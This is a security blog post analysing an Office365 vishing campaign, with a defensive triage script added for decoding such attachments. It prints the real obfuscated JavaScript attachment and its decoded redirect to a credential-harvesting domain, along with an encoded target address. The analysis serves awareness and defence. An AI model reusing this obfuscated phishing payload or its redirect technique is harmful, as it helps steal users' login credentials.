Vishing Scams Targeting Office365 Users

Vishing is a term combining ‘voice’ and ‘phishing’. Those calls you get purporting to be from Apple, the IRS, hotel rewards programs, and auto warranty companies are all forms of vishing. They are designed to scare, intimidate, or create a sense of urgency to get you to reveal personal, sensitive, or confidential information.

Since Covid-19 and the move to remote work, we have seen a rise in vishing attempts targeting Office365 tenants in the form of an email alerting the user to a missed audio message. The email contains an HTML attachment that, when loaded, directs the user to a fake Microsoft login page. The page sits between the user and the real login page, stealing credentials as they are entered. Incorrect credentials fail, valid credentials are accepted, and the user is presented with a ‘failed to retrieve message’ notice. It also contains malicious code that tries to infect the user’s PC.

Here is how the message looks in standard Outlook preview:

[Image: Picture1.png]

The preview looks legitimate enough but opening the message shows an unfamiliar email address.

[Image: Complete Email]

The attachment uses JavaScript to decode the obfuscated (percent-encoded) payload into a script that redirects the browser to the URL of the fake portal:

Original attachment:

“<script language="javascript">document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%22%68%74%74%70%73%3a%2f%2f%66%72%69%74%6f%77%69%6e%67%2e%69%6e%66%6f%2f%63%65%6f%2f%5a%47%39%31%5a%30%42%30%61%48%4a%6c%59%57%52%75%5a%58%52%33%62%33%4a%72%63%79%35%6a%62%32%30%3d%22%3b%3c%2f%73%63%72%69%70%74%3e'));</script>”

Decoded payload:

“<script type="text/javascript">window.location.href ="https://fritowing.info/ceo/ZG91Z0B0aHJlYWRuZXR3b3Jrcy5jb20=";</script>”

Looking at the URL, it appears this particular campaign is targeting CEOs so we could consider this spear vishing.
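The decoding shown above can be done statically during triage, without opening the attachment in a browser. The following is an added example, not code from the original post: the function names are hypothetical, the sample is constructed on the placeholder domain login.example.invalid, and it also decodes Base64-shaped path segments such as the last one in the decoded URL.

```javascript
// Static triage of an HTML attachment: decode unescape() layers and report
// redirect targets as text. Nothing is rendered or executed.
function percentDecode(s) {
  // Same mapping unescape() applies: %XX and %uXXXX become characters.
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Peel nested unescape('...') layers, bounded so hostile input cannot loop.
function peelLayers(html, maxDepth = 5) {
  const layers = [html];
  const re = /unescape\(\s*(['"])([\s\S]*?)\1\s*\)/i;
  for (let i = 0; i < maxDepth; i++) {
    const m = re.exec(layers[layers.length - 1]);
    if (!m) break;
    layers.push(percentDecode(m[2]));
  }
  return layers;
}

// Defang so the URL can go into a ticket without becoming clickable.
const defang = (u) => u.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');

// Decode path segments that look like Base64 and yield printable ASCII.
function decodeSegments(url) {
  let path;
  try { path = new URL(url).pathname; } catch { return []; }
  return path.split('/')
    .filter((seg) => /^[A-Za-z0-9+\/_-]{8,}={0,2}$/.test(seg))
    .map((seg) => Buffer.from(seg, 'base64').toString('utf8'))
    .filter((txt) => /^[\x20-\x7e]+$/.test(txt));
}

function triageAttachment(html) {
  const layers = peelLayers(html);
  const re = /(?:window\.|document\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1/gi;
  const findings = [];
  for (const layer of layers) {
    for (const m of layer.matchAll(re)) {
      findings.push({ url: defang(m[2]), layers: layers.length - 1,
        decoded: decodeSegments(m[2]) });
    }
  }
  return findings;
}

// Constructed sample in the same shape as the attachment above (not a real IoC).
const inner = '<script type="text/javascript">window.location.href ="https://' +
  'login.example.invalid/ceo/' + Buffer.from('user@example.com').toString('base64') + '";</script>';
const encoded = [...inner].map((c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const sample = `<script language="javascript">document.write(unescape('${encoded}'));</script>`;
console.log(JSON.stringify(triageAttachment(sample), null, 2));
```

A non-empty `decoded` list means the link carries readable data in its path, which is worth recording alongside the defanged URL.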

Why is this so dangerous? With a hijacked email account, the bad actor can look through past emails, gather intel on other sites that are associated with the email, request password resets, and gain access to more profitable accounts like your bank, credit card provider, or online shopping where you’ve stored a payment method.

The absolute best way to secure your online accounts, including email, is to use multifactor authentication (MFA). MFA uses a rotating code in combination with your password making it much harder to steal credentials. The premise is that it takes “something you know” — your password, and “something you have” — your authentication code, to log in.

Doug Potter